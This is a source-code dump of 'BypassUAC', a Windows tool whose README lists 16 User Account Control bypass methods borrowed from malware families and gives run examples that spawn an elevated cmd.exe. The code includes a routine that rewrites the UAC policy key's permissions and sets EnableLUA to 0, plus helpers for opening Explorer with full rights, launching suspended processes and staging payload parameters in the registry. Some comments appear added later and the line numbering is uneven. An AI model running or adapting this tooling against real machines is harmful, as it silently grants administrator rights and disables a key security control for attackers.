            SE_REGISTRY_KEY,
            DACL_SECURITY_INFORMATION,
            T_UACKEY,
            T_SDDL_ALL_FOR_EVERYONE)
            )
        {
            break;
        }

        // Step 2 (guarded by bResult, see header comment).
        if (bResult) {

            lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"),
                0, KEY_ALL_ACCESS, &hKey);
            if ((lRet == ERROR_SUCCESS) && (hKey != NULL)) {
                OutputDebugString(TEXT("[UCM] Key security compromised"));
                dwValue = 0;
                RegSetValueEx(hKey, TEXT("EnableLUA"), 0, REG_DWORD, (LPBYTE)&dwValue, sizeof(DWORD));
                RegCloseKey(hKey);
            }
        }

    } while (cond);

    return bResult;
}
232 |
--------------------------------------------------------------------------------
/BypassUAC/simda.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016
4 | *
5 | * TITLE: SIMDA.H
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 16 Nov 2015
10 | *
11 | * Prototypes and definitions for Simda method.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
/*
 * Rewrite the DACL of the UAC policy key through the elevated ISecurityEditor.
 * The EnableLUA write inside is guarded by a flag the function never sets, so
 * the call returns FALSE as written.
 */
BOOL ucmSimdaTurnOffUac(
    VOID
);

/*
 * Apply lpSddlString to lpTargetObject (of ObjectType, for SecurityInformation)
 * via the elevated ISecurityEditor.  Both strings must be non-NULL and 1..MAX_PATH
 * characters long; returns the result of ucmInjectExplorer.
 */
BOOL ucmSimdaAlterObjectSecurity(
    SE_OBJECT_TYPE ObjectType,
    SECURITY_INFORMATION SecurityInformation,
    LPWSTR lpTargetObject,
    LPWSTR lpSddlString
);
31 |
--------------------------------------------------------------------------------
/BypassUAC/sup.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016
4 | *
5 | * TITLE: SUP.C
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 16 Nov 2015
10 | *
11 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
12 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
13 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
14 | * PARTICULAR PURPOSE.
15 | *
16 | *******************************************************************************/
17 |
18 | #include "global.h"
19 |
/*
 * supIsProcess32bit
 *
 * Purpose:
 *
 * Return TRUE if given process is under WOW64, FALSE otherwise.
 *
 * hProcess must allow process information queries.  A NULL handle or a
 * failed NtQueryInformationProcess also yields FALSE, so the caller
 * cannot tell "native 64-bit" from "could not query".
 */
BOOLEAN supIsProcess32bit(
    _In_ HANDLE hProcess
)
{
    PROCESS_EXTENDED_BASIC_INFORMATION pebi;
    NTSTATUS status;

    if (hProcess == NULL) {
        return FALSE;
    }

    // ProcessBasicInformation with Size set requests the extended record,
    // which carries the WOW64 flag.
    RtlSecureZeroMemory(&pebi, sizeof(pebi));
    pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);
    status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);
    if (!NT_SUCCESS(status)) {
        return FALSE;
    }

    return (pebi.IsWow64Process == 1);
}
48 |
/*
 * supGetExplorerHandle
 *
 * Purpose:
 *
 * Returns Explorer process handle opened with maximum allowed rights or NULL on error.
 *
 * The shell process is located through the owner of the "Shell_TrayWnd"
 * window; if that window does not exist (no shell running) or yields no
 * process id, NULL is returned.  The caller owns the returned handle.
 */
HANDLE supGetExplorerHandle(
    VOID
)
{
    DWORD dwPid = 0;
    HWND hTray;

    // The taskbar window belongs to the shell process.
    hTray = FindWindow(TEXT("Shell_TrayWnd"), NULL);
    if (hTray != NULL) {
        GetWindowThreadProcessId(hTray, &dwPid);
    }

    if (dwPid == 0) {
        return NULL;
    }

    return OpenProcess(MAXIMUM_ALLOWED, FALSE, dwPid);
}
74 |
/*
 * supGetElevationType
 *
 * Purpose:
 *
 * Returns client elevation type.
 *
 * Queries TokenElevationType on the current process token into *lpType.
 * Returns TRUE on success; on failure returns FALSE with the last error
 * set from the NTSTATUS (the last error is also set on success, to the
 * mapping of the successful status).
 */
BOOL supGetElevationType(
    TOKEN_ELEVATION_TYPE *lpType
)
{
    HANDLE hToken = NULL;
    ULONG cbReturned = 0;
    NTSTATUS status;

    if (lpType == NULL) {
        return FALSE;
    }

    status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);
    if (!NT_SUCCESS(status)) {
        SetLastError(RtlNtStatusToDosError(status));
        return FALSE;
    }

    status = NtQueryInformationToken(hToken, TokenElevationType, lpType,
        sizeof(TOKEN_ELEVATION_TYPE), &cbReturned);

    // Mirror the query status into the Win32 last error before releasing the token.
    SetLastError(RtlNtStatusToDosError(status));
    NtClose(hToken);

    return NT_SUCCESS(status);
}
110 |
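/*
 * supWriteBufferToFile
 *
 * Purpose:
 *
 * Create new file and write buffer to it.
 *
 * lpFileName is created (or truncated) with CREATE_ALWAYS and no sharing,
 * then BufferSize bytes from Buffer are written in one WriteFile call.
 *
 * Returns TRUE only when WriteFile succeeded and reported exactly
 * BufferSize bytes; FALSE for NULL/empty arguments, a failed CreateFileW,
 * a failed WriteFile or a short write.  A partially written file is left
 * in place on failure.
 */
BOOL supWriteBufferToFile(
    _In_ LPWSTR lpFileName,
    _In_ PVOID Buffer,
    _In_ DWORD BufferSize
)
{
    HANDLE hFile;
    DWORD bytesIO = 0;   // zeroed so a failed WriteFile can never leave it uninitialized
    BOOL bWritten;

    if (
        (lpFileName == NULL) ||
        (Buffer == NULL) ||
        (BufferSize == 0)
        )
    {
        return FALSE;
    }

    hFile = CreateFileW(lpFileName,
        GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    // Check the call itself, not just the byte count.
    bWritten = WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL);
    CloseHandle(hFile);

    return (bWritten && (bytesIO == BufferSize));
}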
149 |
/*
 * supRunProcess
 *
 * Purpose:
 *
 * Execute given process with given parameters.
 *
 * Launches lpszProcessName through ShellExecuteExW with the optional
 * lpszParameters, waits up to 0x8000 ms for the child and then closes its
 * handle.  The wait result is ignored, so the child may still be running
 * on return.  Returns the ShellExecuteExW result (FALSE when
 * lpszProcessName is NULL).
 */
BOOL supRunProcess(
    _In_ LPWSTR lpszProcessName,
    _In_opt_ LPWSTR lpszParameters
)
{
    SHELLEXECUTEINFOW sei;
    BOOL bStarted;

    if (lpszProcessName == NULL) {
        return FALSE;
    }

    RtlSecureZeroMemory(&sei, sizeof(sei));
    sei.cbSize = sizeof(sei);
    sei.fMask = SEE_MASK_NOCLOSEPROCESS;   // we need hProcess back to wait on it
    sei.lpFile = lpszProcessName;
    sei.lpParameters = lpszParameters;
    sei.lpDirectory = NULL;
    sei.nShow = SW_SHOW;

    bStarted = ShellExecuteExW(&sei);
    if (bStarted) {
        // Bounded wait (~32 s); hProcess may be NULL if no new process was created.
        WaitForSingleObject(sei.hProcess, 0x8000);
        CloseHandle(sei.hProcess);
    }

    return bStarted;
}
184 |
/*
* supRunProcessEx
*
* Purpose:
*
* Start new process in suspended state.
*
* Parameters:
*
* lpszParameters     - full command line. It is copied to a private
*                      writable buffer because CreateProcessW may modify
*                      the string it is given. lpApplicationName is NULL,
*                      so CreateProcessW extracts the executable path from
*                      this string itself: a path containing spaces must
*                      be quoted by the caller.
* lpCurrentDirectory - optional working directory for the new process.
* PrimaryThread      - optional; receives the handle of the suspended
*                      primary thread, which the caller must close. When
*                      NULL, the thread handle is closed here.
*
* Return:
*
* Process handle (caller must close it), or NULL on failure.
*
*/
HANDLE supRunProcessEx(
    _In_ LPWSTR lpszParameters,
    _In_opt_ LPWSTR lpCurrentDirectory,
    _Out_opt_ HANDLE *PrimaryThread
)
{
    LPWSTR lpCmdLine;
    SIZE_T cbCmdLine;
    STARTUPINFOW startupInfo;
    PROCESS_INFORMATION procInfo;
    HANDLE hProcess = NULL;

    if (PrimaryThread != NULL) {
        *PrimaryThread = NULL;
    }

    if (lpszParameters == NULL) {
        return NULL;
    }

    /* Zero-filled private copy, terminator included. */
    cbCmdLine = (_strlen_w(lpszParameters) + 1) * sizeof(WCHAR);
    lpCmdLine = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cbCmdLine);
    if (lpCmdLine == NULL) {
        return NULL;
    }
    _strcpy_w(lpCmdLine, lpszParameters);

    RtlSecureZeroMemory(&procInfo, sizeof(procInfo));
    RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
    GetStartupInfoW(&startupInfo);

    if (CreateProcessW(NULL, lpCmdLine, NULL, NULL, FALSE,
        CREATE_DEFAULT_ERROR_MODE | NORMAL_PRIORITY_CLASS | CREATE_SUSPENDED,
        NULL, lpCurrentDirectory, &startupInfo, &procInfo))
    {
        hProcess = procInfo.hProcess;
        if (PrimaryThread != NULL) {
            *PrimaryThread = procInfo.hThread;
        }
        else {
            CloseHandle(procInfo.hThread);
        }
    }

    HeapFree(GetProcessHeap(), 0, lpCmdLine);

    return hProcess;
}
246 |
/*
* _filenameW
*
* Purpose:
*
* Return name part of filename: the substring after the last backslash,
* or the whole string when it contains no backslash.
*
* Only '\\' is treated as a separator ('/' is not). Returns 0 for a NULL
* input. The result points into the caller's string (const is cast away).
*
*/
wchar_t *_filenameW(
    const wchar_t *f
)
{
    const wchar_t *cursor;
    const wchar_t *name;

    if (f == 0)
        return 0;

    name = f;
    for (cursor = f; *cursor != (wchar_t)0; cursor++) {
        if (*cursor == (wchar_t)'\\')
            name = cursor + 1;
    }
    return (wchar_t *)name;
}
271 |
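/*
* supCopyMemory
*
* Purpose:
*
* Copies bytes between buffers without ever writing past the end of the
* destination.
*
* dest - Destination buffer
* cbdest - Destination buffer size in bytes
* src - Source buffer
* cbsrc - Source buffer size in bytes
*
* The number of bytes copied is min(cbdest, cbsrc); an oversized source
* is silently truncated. Nothing is done when either pointer is NULL or
* cbdest is 0. Overlapping regions are not handled (plain forward copy).
*
*/
void supCopyMemory(
    _Inout_ void *dest,
    _In_ size_t cbdest,
    _In_ const void *src,
    _In_ size_t cbsrc
)
{
    unsigned char *d = (unsigned char *)dest;
    const unsigned char *s = (const unsigned char *)src;
    size_t cb;

    if ((dest == 0) || (src == 0) || (cbdest == 0))
        return;

    /* Clamp to the destination size so a larger source cannot overflow dest. */
    cb = (cbsrc < cbdest) ? cbsrc : cbdest;

    while (cb > 0) {
        *d++ = *s++;
        cb--;
    }
}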
305 |
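/*
* supQueryEntryPointRVA
*
* Purpose:
*
* Return EP RVA of the given PE file, or 0 when the file cannot be
* mapped or carries no valid NT headers.
*
* The file is mapped with LoadLibraryExW(DONT_RESOLVE_DLL_REFERENCES),
* its headers are read, and the mapping is released before returning.
* NOTE(review): that flag still maps the file as a loadable module; a
* data-only mapping flag would be preferable for header inspection, but
* it changes the returned base/handle semantics - confirm before changing.
*
*/
DWORD supQueryEntryPointRVA(
    _In_ LPWSTR lpImageFile
)
{
    PVOID ImageBase;
    PIMAGE_NT_HEADERS NtHeaders;
    DWORD epRVA = 0;

    if (lpImageFile == NULL) {
        return 0;
    }

    ImageBase = LoadLibraryExW(lpImageFile, 0, DONT_RESOLVE_DLL_REFERENCES);
    if (ImageBase) {

        /* RtlImageNtHeader checks the DOS/NT signatures and returns NULL
           on a malformed header, which raw e_lfanew arithmetic does not;
           it is also what supVerifyMappedImageMatchesChecksum uses. */
        NtHeaders = RtlImageNtHeader(ImageBase);
        if (NtHeaders != NULL) {
            //AddressOfEntryPoint is in standard fields.
            epRVA = NtHeaders->OptionalHeader.AddressOfEntryPoint;
        }

        FreeLibrary(ImageBase);
    }
    return epRVA;
}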
342 |
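/*
* supSetParameter
*
* Purpose:
*
* Set parameter for payload execution: stores lpParameter as the REG_SZ
* value T_AKAGI_PARAM under the per-user key HKCU\T_AKAGI_KEY, creating
* the key when it does not exist.
*
* Parameters:
*
* lpParameter - NUL-terminated wide string; must not be NULL.
* cbParameter - size of lpParameter in bytes, terminating NUL included
*               (REG_SZ convention; not verified here).
*
* Return:
*
* TRUE if the value was written, FALSE otherwise.
*
*/
BOOL supSetParameter(
    LPWSTR lpParameter,
    DWORD cbParameter
)
{
    BOOL bResult = FALSE;
    HKEY hKey = NULL;
    LONG lRet;

    /* RegSetValueExW would read through a NULL buffer when cbParameter > 0. */
    if (lpParameter == NULL) {
        return FALSE;
    }

    /* KEY_SET_VALUE is all RegSetValueExW needs; a wider mask such as
       KEY_ALL_ACCESS grants nothing this routine uses. */
    lRet = RegCreateKeyExW(HKEY_CURRENT_USER, T_AKAGI_KEY, 0, NULL,
        REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL);

    if ((lRet == ERROR_SUCCESS) && (hKey != NULL)) {
        lRet = RegSetValueExW(hKey, T_AKAGI_PARAM, 0, REG_SZ,
            (LPBYTE)lpParameter, cbParameter);

        bResult = (lRet == ERROR_SUCCESS);

        RegCloseKey(hKey);
    }

    return bResult;
}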
383 |
/*
* supChkSum
*
* Purpose:
*
* Calculate partial checksum for given buffer: adds Length 16-bit words
* from Source to PartialSum, folding the carry out of bit 16 back into
* the low word after every addition, then returns the low 16 bits of a
* final fold.
*
*/
USHORT supChkSum(
    ULONG PartialSum,
    PUSHORT Source,
    ULONG Length
)
{
    ULONG sum = PartialSum;
    ULONG i;

    for (i = 0; i < Length; i++) {
        sum += Source[i];
        /* end-around carry: keep the running value within 17 bits */
        sum = (sum >> 16) + (sum & 0xffff);
    }

    return (USHORT)(((sum >> 16) + sum) & 0xffff);
}
404 |
/*
* supVerifyMappedImageMatchesChecksum
*
* Purpose:
*
* Calculate PE file checksum and compare it with checksum in PE header.
*
* BaseAddress - first byte of the image (file contents or mapped view).
* FileLength  - number of image bytes at BaseAddress.
*
* Return: TRUE when the computed value equals OptionalHeader.CheckSum.
*
* The sum covers (FileLength + 1) / 2 words, so for an odd FileLength
* the byte just past the end is read too; the buffer is assumed to be
* padded - TODO confirm at the call sites.
* When RtlImageNtHeader finds no valid headers the comparison becomes
* FileLength == FileLength and returns TRUE; NOTE(review): callers must
* therefore validate the headers separately if a malformed image should
* be rejected - confirm this is intended.
*
*/
BOOLEAN supVerifyMappedImageMatchesChecksum(
    _In_ PVOID BaseAddress,
    _In_ ULONG FileLength
)
{
    PUSHORT AdjustSum;
    PIMAGE_NT_HEADERS NtHeaders;
    USHORT PartialSum;
    ULONG HeaderSum;
    ULONG CheckSum;

    HeaderSum = 0;
    /* Folded 16-bit sum over the whole image, the CheckSum field included. */
    PartialSum = supChkSum(0, (PUSHORT)BaseAddress, (FileLength + 1) >> 1);

    NtHeaders = RtlImageNtHeader(BaseAddress);
    if (NtHeaders != NULL) {
        HeaderSum = NtHeaders->OptionalHeader.CheckSum;
        /* AdjustSum[0] / [1] are the low and high 16-bit halves of the
           stored CheckSum. Subtract each with an explicit borrow so the
           stored value is removed from the one's-complement style sum. */
        AdjustSum = (PUSHORT)(&NtHeaders->OptionalHeader.CheckSum);
        PartialSum -= (PartialSum < AdjustSum[0]);
        PartialSum -= AdjustSum[0];
        PartialSum -= (PartialSum < AdjustSum[1]);
        PartialSum -= AdjustSum[1];
    }
    else
    {
        /* No headers: force the comparison below to succeed. */
        PartialSum = 0;
        HeaderSum = FileLength;
    }
    /* The PE checksum is the folded word sum plus the file length. */
    CheckSum = (ULONG)PartialSum + FileLength;
    return (CheckSum == HeaderSum);
}
444 |
/*
* ucmShowMessage
*
* Purpose:
*
* Output message to user in an information message box titled
* PROGRAMTITLE. A NULL message shows nothing.
*
*/
VOID ucmShowMessage(
    LPWSTR lpszMsg
)
{
    if (lpszMsg == NULL) {
        return;
    }
    MessageBoxW(GetDesktopWindow(), lpszMsg, PROGRAMTITLE, MB_ICONINFORMATION);
}
462 |
/*
* ucmShowQuestion
*
* Purpose:
*
* Output message with question to user (Yes/No box titled PROGRAMTITLE)
* and return the MessageBoxW result. Unlike ucmShowMessage, a NULL
* lpszMsg is passed straight through to MessageBoxW.
*
*/
INT ucmShowQuestion(
    LPWSTR lpszMsg
)
{
    INT answer;

    answer = MessageBoxW(GetDesktopWindow(), lpszMsg, PROGRAMTITLE, MB_YESNO);
    return answer;
}
477 |
--------------------------------------------------------------------------------
/BypassUAC/sup.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2014 - 2016
4 | *
5 | * TITLE: SUP.H
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 16 Nov 2015
10 | *
11 | * Common header file for the program support routines.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
#pragma once

/* Presumably reports whether hProcess is a 32-bit process; the body lives
   in sup.c and is not part of this excerpt - verify there. */
BOOLEAN supIsProcess32bit(
    _In_ HANDLE hProcess
);

/* Presumably returns a handle related to the Explorer process; see sup.c. */
HANDLE supGetExplorerHandle(
    VOID
);

/* Queries TokenElevationType of the current process token into *lpType.
   FALSE on a NULL lpType or an NT failure; last error is set from the
   NTSTATUS of the query. */
BOOL supGetElevationType(
    TOKEN_ELEVATION_TYPE *lpType
);

/* Creates (CREATE_ALWAYS) lpFileName and writes BufferSize bytes to it.
   FALSE on NULL arguments, BufferSize == 0, or a failed/short write. */
BOOL supWriteBufferToFile(
    _In_ LPWSTR lpFileName,
    _In_ PVOID Buffer,
    _In_ DWORD BufferSize
);

/* Launches lpszProcessName via ShellExecuteExW and waits (bounded) for it.
   Returns the ShellExecuteExW result. */
BOOL supRunProcess(
    _In_ LPWSTR lpszProcessName,
    _In_opt_ LPWSTR lpszParameters
);

/* Creates a suspended process from the command line lpszParameters.
   Returns the process handle (caller closes) or NULL; the primary thread
   handle is returned through PrimaryThread when that is non-NULL,
   otherwise closed. */
HANDLE supRunProcessEx(
    _In_ LPWSTR lpszParameters,
    _In_opt_ LPWSTR lpCurrentDirectory,
    _Out_opt_ HANDLE *PrimaryThread
);

/* Pointer to the part of f after its last '\\' (f itself if none);
   0 for a NULL f. */
wchar_t *_filenameW(
    const wchar_t *f
);

/* Bounded byte copy: copies at most cbdest bytes of src into dest. */
void supCopyMemory(
    _Inout_ void *dest,
    _In_ size_t cbdest,
    _In_ const void *src,
    _In_ size_t cbsrc
);

/* AddressOfEntryPoint of the PE file at lpImageFile, 0 on failure. */
DWORD supQueryEntryPointRVA(
    _In_ LPWSTR lpImageFile
);

/* Stores lpParameter (cbParameter bytes, REG_SZ) as T_AKAGI_PARAM under
   HKCU\T_AKAGI_KEY. TRUE on success. */
BOOL supSetParameter(
    LPWSTR lpParameter,
    DWORD cbParameter
);

/* TRUE when the PE checksum computed over FileLength bytes at BaseAddress
   equals OptionalHeader.CheckSum (also TRUE when no NT headers are found). */
BOOLEAN supVerifyMappedImageMatchesChecksum(
    _In_ PVOID BaseAddress,
    _In_ ULONG FileLength
);

/* Information message box titled PROGRAMTITLE; NULL message shows nothing. */
VOID ucmShowMessage(
    LPWSTR lpszMsg
);

/* Yes/No message box titled PROGRAMTITLE; returns the MessageBoxW result. */
INT ucmShowQuestion(
    LPWSTR lpszMsg
);
82 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # BypassUAC
2 | Defeating Windows User Account Control by abusing the built-in Windows AutoElevate backdoor.
3 |
4 | # System Requirements
5 | 1. x86-32/x64 Windows 7/8/8.1/10 (client; some methods, however, also work on the server editions).
6 |
7 | 2. An admin account with UAC set to its default settings is required.
8 |
9 | # Usage
10 | Run executable from command line: BypassUAC_x86 [Key] [Param] or BypassUAC_x64 [Key] [Param]. See "Run examples" below for more info.
11 |
12 | The first parameter is the number of the method to use; the second is an optional command (executable file name, including full path) to run. The second parameter can be empty, in which case the program will execute an elevated cmd.exe from the system32 folder.
13 |
14 | Keys (watch the debug output with dbgview or a similar tool for more info):
15 |
16 | 1 - Leo Davidson sysprep method, this will work only on Windows 7 and Windows 8, used in multiple malware;
17 |
18 | 2 - Tweaked Leo Davidson sysprep method, this will work only on Windows 8.1.9600;
19 |
20 | 3 - Leo Davidson method tweaked by WinNT/Pitou developers, works from Windows 7 up to 10th2 10532;
21 |
22 | 4 - Application Compatibility Shim RedirectEXE method, from WinNT/Gootkit. Works from Windows 7 up to 8.1.9600;
23 |
24 | 5 - ISecurityEditor WinNT/Simda method, used to turn off UAC, works from Windows 7 up to Windows 10th1 100136;
25 |
26 | 6 - Wusa method used by Win32/Carberp, tweaked to work with Windows 8/8.1 also;
27 |
28 | 7 - Wusa method, tweaked to work from Windows 7 up to 10th1 10136;
29 |
30 | 8 - Slightly modified Leo Davidson method used by Win32/Tilon, works only on Windows 7;
31 |
32 | 9 - Hybrid method, combination of WinNT/Simda and Win32/Carberp + AVrf, works from Windows 7 up to 10th1 10136;
33 |
34 | 10 - Hybrid method, abusing appinfo.dll way of whitelisting autoelevated applications and KnownDlls cache changes, works from Windows 7 up to 10th2 10532;
35 |
36 | 11 - WinNT/Gootkit second method based on the memory patching from MS "Fix it" patch shim (and as side effect - arbitrary dll injection), works from Windows 7 up to 8.1.9600;
37 |
38 | 12 - Windows 10 sysprep method, abusing different dll dependency added in Windows 10 (works up to 10th2 10558);
39 |
40 | 13 - Hybrid method, abusing appinfo.dll way of whitelisting MMC console commands and EventViewer missing dependency, works from Windows 7 up to 10rs1 11082;
41 |
42 | 14 - WinNT/Sirefef method, abusing appinfo.dll way of whitelisting OOBE.exe, works from Windows 7 up to 10th2 10558;
43 |
44 | 15 - Win32/Addrop method, also used in Metasploit uacbypass module, works from Windows 7 up to 10rs1 11082;
45 |
46 | 16 - Hybrid method working together with Microsoft GWX backdoor, work from Windows 7 up to 10rs1 11082.
47 |
48 |
49 | Note:
50 |
51 | Several methods require process injection, so they won't work from wow64; use the x64 edition of this tool;
52 |
53 | Method (4) is unavailable in the 64-bit edition because of a Shim restriction;
54 |
55 | Method (6) unavailable in wow64 environment starting from Windows 8. Also target application unavailable in Windows 10;
56 |
57 | Method (11) implemented in x86-32 version;
58 |
59 | Method (13) implemented only in x64 version.
60 |
61 |
62 | Run examples:
63 |
64 | BypassUAC_x86.ex 1 cmd.exe
65 |
66 | BypassUAC_x64.ex 3 cmd.exe
67 |
68 |
--------------------------------------------------------------------------------
/Shared/_strcat.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/* Append src to the NUL-terminated string in dest. Unlike the CRT strcat,
   the return value is a pointer to the NEW terminating NUL of dest (so
   calls can be chained); dest is returned unchanged when either pointer is
   NULL. No bounds are checked - the caller guarantees dest has room. */
char *_strcat_a(char *dest, const char *src)
{
    char *end;

    if ((dest == 0) || (src == 0))
        return dest;

    /* locate the current terminator of dest */
    end = dest;
    while (*end != 0)
        end++;

    /* copy src behind it, then terminate */
    for (; *src != 0; src++, end++)
        *end = *src;

    *end = 0;
    return end;
}
20 |
/* Wide-character counterpart of _strcat_a: appends src to dest and returns
   a pointer to the new terminating NUL of dest (not dest itself). Returns
   dest unchanged when either pointer is NULL; no bounds checking. */
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *end;

    if ((dest == 0) || (src == 0))
        return dest;

    /* locate the current terminator of dest */
    end = dest;
    while (*end != 0)
        end++;

    /* copy src behind it, then terminate */
    for (; *src != 0; src++, end++)
        *end = *src;

    *end = 0;
    return end;
}
38 |
--------------------------------------------------------------------------------
/Shared/_strcmp.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/* Compare two NUL-terminated byte strings. Returns 0 when equal (including
   when both pointers are identical or both NULL); a NULL s1 sorts first
   (-1), a NULL s2 last (1). Otherwise returns the difference of the first
   differing chars, computed on plain char (sign depends on the platform's
   char signedness). */
int _strcmp_a(const char *s1, const char *s2)
{
    char c1 = 0, c2 = 0;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    for (;;) {
        c1 = *s1++;
        c2 = *s2++;
        /* stop at the end of s1 or at the first mismatch */
        if ((c1 == 0) || (c1 != c2))
            break;
    }

    return (int)(c1 - c2);
}
25 |
/* Wide-character counterpart of _strcmp_a: 0 when equal (or same pointer,
   or both NULL), -1 for a NULL s1, 1 for a NULL s2, otherwise the
   difference of the first differing characters. */
int _strcmp_w(const wchar_t *s1, const wchar_t *s2)
{
    wchar_t c1 = 0, c2 = 0;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    for (;;) {
        c1 = *s1++;
        c2 = *s2++;
        /* stop at the end of s1 or at the first mismatch */
        if ((c1 == 0) || (c1 != c2))
            break;
    }

    return (int)(c1 - c2);
}
48 |
--------------------------------------------------------------------------------
/Shared/_strcmpi.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/* Case-insensitive _strcmp_a. Only ASCII 'A'..'Z' are folded (via
   locase_a); other bytes compare as-is. Same NULL handling and return
   convention as _strcmp_a: 0 equal, -1 NULL s1, 1 NULL s2, otherwise the
   difference of the first differing (folded) chars. */
int _strcmpi_a(const char *s1, const char *s2)
{
    char c1 = 0, c2 = 0;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    for (;;) {
        c1 = locase_a(*s1++);
        c2 = locase_a(*s2++);
        if ((c1 == 0) || (c1 != c2))
            break;
    }

    return (int)(c1 - c2);
}
25 |
/* Case-insensitive _strcmp_w. Only ASCII 'A'..'Z' are folded (via
   locase_w); other characters compare as-is. Same NULL handling and
   return convention as _strcmp_w. */
int _strcmpi_w(const wchar_t *s1, const wchar_t *s2)
{
    wchar_t c1 = 0, c2 = 0;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    for (;;) {
        c1 = locase_w(*s1++);
        c2 = locase_w(*s2++);
        if ((c1 == 0) || (c1 != c2))
            break;
    }

    return (int)(c1 - c2);
}
48 |
--------------------------------------------------------------------------------
/Shared/_strcpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/* Copy the NUL-terminated string src into dest (terminator included) and
   return dest. dest is returned untouched when either pointer is NULL or
   both point at the same string. No bounds checking. */
char *_strcpy_a(char *dest, const char *src)
{
    char *out = dest;

    if ((dest == 0) || (src == 0) || (dest == src))
        return dest;

    /* the assignment in the condition also writes the terminator */
    while ((*out = *src) != 0) {
        out++;
        src++;
    }
    return dest;
}
23 |
/* Wide-character counterpart of _strcpy_a: copies src (terminator
   included) into dest and returns dest; returns dest untouched when
   either pointer is NULL or both are the same. No bounds checking. */
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
{
    wchar_t *out = dest;

    if ((dest == 0) || (src == 0) || (dest == src))
        return dest;

    /* the assignment in the condition also writes the terminator */
    while ((*out = *src) != 0) {
        out++;
        src++;
    }
    return dest;
}
44 |
--------------------------------------------------------------------------------
/Shared/_strend.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/* Return a pointer to the terminating NUL of s (0 for a NULL s). The
   result aliases the input; const is cast away. */
char *_strend_a(const char *s)
{
    const char *p = s;

    if (p == 0)
        return 0;

    for (; *p != 0; p++)
        ;

    return (char *)p;
}
13 |
/* Wide-character counterpart of _strend_a: pointer to the terminating
   NUL of s, or 0 for a NULL s. */
wchar_t *_strend_w(const wchar_t *s)
{
    const wchar_t *p = s;

    if (p == 0)
        return 0;

    for (; *p != 0; p++)
        ;

    return (wchar_t *)p;
}
24 |
--------------------------------------------------------------------------------
/Shared/_strlen.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/* Length in bytes of the NUL-terminated string s, excluding the
   terminator; 0 for a NULL s. */
size_t _strlen_a(const char *s)
{
    size_t n = 0;

    if (s == 0)
        return 0;

    while (s[n] != 0)
        n++;

    return n;
}
15 |
/* Length in characters (not bytes) of the NUL-terminated wide string s,
   excluding the terminator; 0 for a NULL s. */
size_t _strlen_w(const wchar_t *s)
{
    size_t n = 0;

    if (s == 0)
        return 0;

    while (s[n] != 0)
        n++;

    return n;
}
28 |
--------------------------------------------------------------------------------
/Shared/_strncmp.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/* Compare at most cchars bytes of two NUL-terminated strings. Returns 0
   when equal within the limit (or same pointer, both NULL, or cchars == 0),
   -1 for a NULL s1, 1 for a NULL s2, otherwise the difference of the first
   differing chars. */
int _strncmp_a(const char *s1, const char *s2, size_t cchars)
{
    char c1 = 0, c2 = 0;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;

    while (cchars > 0) {
        c1 = *s1++;
        c2 = *s2++;
        cchars--;
        /* stop at the end of s1 or at the first mismatch */
        if ((c1 == 0) || (c1 != c2))
            break;
    }

    return (int)(c1 - c2);
}
29 |
/* Wide-character counterpart of _strncmp_a: compares at most cchars
